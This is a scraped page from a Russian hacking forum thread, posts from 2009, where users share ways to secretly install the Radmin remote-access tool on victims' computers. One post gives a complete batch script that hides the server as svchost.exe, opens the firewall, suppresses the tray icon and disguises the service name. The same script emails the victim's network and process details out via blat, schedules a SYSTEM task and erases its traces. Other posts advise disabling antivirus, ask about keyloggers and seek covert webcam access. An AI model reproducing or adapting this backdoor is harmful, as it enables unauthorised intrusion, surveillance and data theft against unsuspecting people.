ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > АнтиАдмин
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #311  
Старый 24.11.2009, 01:18
saintnameless
Новичок
Регистрация: 13.11.2009
Сообщений: 1
Провел на форуме:
6304

Репутация: 0
Exclamation

все сделал как надо,а иконка с трея не пропадает...что там прописать надО?просто на ноль изменить?
 
Ответить с цитированием

  #312  
Старый 24.11.2009, 01:38
F3x111TsSL
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200

Репутация: 6
По умолчанию

а какая версия радмина? в последних версиях иконка не убирается
 
Ответить с цитированием

  #313  
Старый 24.11.2009, 14:38
Pika4u
Новичок
Регистрация: 22.11.2009
Сообщений: 3
Провел на форуме:
5472

Репутация: 0
По умолчанию

Цитата:
Сообщение от F3x111TsSL  
конечно в автозапуск
если кейлогер позволяет - настрой полностью его и скопируй файлы на комп жертве, а потом просто кинь ссылку в автозагрузку
Это я все прекрасно понимаю, вопрос в том какой (название программы) кейлокер для этого подходит, я конечно нашёл один под название Детектив, но хотелось бы что то по функциональней.
 
Ответить с цитированием

  #314  
Старый 25.11.2009, 15:44
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Статья супер, у меня вопрос, я знаю ip компа, имею к нему физический доступ но не постоянный, как мне с ним управлять со своего компа
 
Ответить с цитированием

  #315  
Старый 25.11.2009, 21:10
Pika4u
Новичок
Регистрация: 22.11.2009
Сообщений: 3
Провел на форуме:
5472

Репутация: 0
По умолчанию

Цитата:
Сообщение от Keltos  
Статья супер, у меня вопрос, я знаю ip компа, имею к нему физический доступ но не постоянный, как мне с ним управлять со своего компа
Со своего компа, навряд ли получится, а так качаешь архив "111", разархивируешь его, там у тебя будет файл 111.bat, !!!Не забудь при этом антивирус вырубить, а то заругается!!! Приносишь разархивируную папку на тот комп и запускаеть 111.Бат !!!Про антивирус опять не забываем!!! После запуска можно уже конектиться к этому компу, не забудь узнать его IP в сети, и скачай прогу Радмин Вьювер, с помощью её и будешь конектиться. вот вроде и все
 
Ответить с цитированием

  #316  
Старый 26.11.2009, 10:08
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Цитата:
Сообщение от Pika4u  
Со своего компа, навряд ли получится, а так качаешь архив "111", разархивируешь его, там у тебя будет файл 111.bat, !!!Не забудь при этом антивирус вырубить, а то заругается!!! Приносишь разархивируную папку на тот комп и запускаеть 111.Бат !!!Про антивирус опять не забываем!!! После запуска можно уже конектиться к этому компу, не забудь узнать его IP в сети, и скачай прогу Радмин Вьювер, с помощью её и будешь конектиться. вот вроде и все
Что плохо там еще инет не постоянный
 
Ответить с цитированием

  #317  
Старый 03.12.2009, 16:02
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию

Цитата:
Сообщение от sam732  
ТАКОЙ ВОПРОС : Я закинул челу скрытого установщика радмина( с паролем privedmidved который ) как мне там щас сделать так чтоб к его компу тока я смог подключаться? как порт сменить или пасс на уже устпновленном компе не закидывая заново новый установщик ?
а какого именно? чья сборка была?
вроде там если не скрытаят установка,то можно ограничить и порт поменять,а так посмотри в *.bat
 
Ответить с цитированием

  #318  
Старый 08.12.2009, 22:20
the_apx
Новичок
Регистрация: 08.12.2009
Сообщений: 2
Провел на форуме:
24926

Репутация: 0
Отправить сообщение для the_apx с помощью ICQ
По умолчанию

А вот такой глупый вопросик)

Там стоит команда подчистки файлов распакованных самой сборкой посли их копирования в Windows и System32.

А как будет выглядеть текст bat файла который "подчистит" за собой эти файлы из этих каталогов? Тоесть автоматизировать это дело) Чтото вроде таблетки.

Буду весьма благодарен за помощь)

Текст bat файла сборки:
Код:
cmdow @ /HID


copy /y "blat.exe" "%SYSTEMROOT%/system32/blat.exe"
copy /y "blat.lib" "%SYSTEMROOT%/system32/blat.lib"
copy /y "blat.dll" "%SYSTEMROOT%/system32/blat.dll"
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe" 
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"

netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE

REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

%SYSTEMROOT%/system32/blat.exe -install -server mail.ru -port xxxx -f user@mail.ru -u user -pw pass

ipconfig /all > %systemroot%/system32/ip.txt
tasklist > %systemroot%/system32/task.txt

blat.exe %systemroot%/system32/ip.txt -to user@mail.ru 
blat.exe %systemroot%/system32/task.txt -to user@mail.ru

schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr %SYSTEMROOT%/system32\ip.bat


del cmdow.exe
del blat.exe
del blat.lib
del blat.dll
del raddrv.dll
del admdll.dll
del svchost.exe
del install.bat
 
Ответить с цитированием

  #319  
Старый 10.12.2009, 23:19
viryspra
Новичок
Регистрация: 10.12.2009
Сообщений: 1
Провел на форуме:
5132

Репутация: 0
По умолчанию

НАРОД ПОМОГИТЕ - ЕСТЬ КОМП С ВЕБКОЙ И ПОЛНЫМ ДОСТУПОМ - ВИНДА - АНТИВИРУС МОЯ И Т.Д - КАК МНЕ С НИМ НАТИХОРЯ КОНЕКТИТСЯ А ЕЩЕ ЛУТЧЕ ВЕБКУ СМОТРЕТЬ ... АЙПИ ПОСТОЯННЫЕ - НО МЫ У РАЗНЫХ ПРОВАЙДЕРОВ - У МЕНЯ ВАЙ ФАЙ - И СЕТКА ГОРОДСКАЯ - ОН НА САТЕЛИТ ПО ДОМАМ КАБЕЛЬ КИДАЮТ СЕТЕВОЙ .... Р АДМИНА - СТАВИЛ НЕ ПОЛУЧАЕТСЯ КОНЕКТИТСЯ -

ПОМОГИТЕ КАК НАСТРОИТЬ - КАКОЙ ИМЕННО АЙПИ ЕГО ???
 
Ответить с цитированием

  #320  
Старый 14.12.2009, 15:20
bibop14
Новичок
Регистрация: 14.12.2009
Сообщений: 2
Провел на форуме:
8549

Репутация: 0
Lightbulb

Цитата:
Сообщение от Berg25  
Привет, я извиняюсь может тут уже вылаживали эту сборку.
Сборка радмин серва: скрытная установка, без значка в трее, после запуска приходит отчет с IP на почту, указаную в настройках файла Install.bat.
1. извлекаем из архива MULT_AGENT.exe
2. меняем расширение exe на rar
3. извлекаем install.bat
4. ищем строки как показано на скрине который имеется в архиве.
5. вписуем адрес почты, имя пароль и адрес почты куда придет отчет.
6 сохраняем.
7. кидаем обратно в архив и меняем расширение rar на exe
8.кидаем жертве, проверяем почту, берем ip коннектимся.
если у жертвы динамический ip кидаем в автозагрузку ему Install.bat
вродебы пока. что палится только каспером
пароль к архиву antichat.ru

СКАЧАТЬ
А какой логин и пароль надо вводить при коннекте к жертве ?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ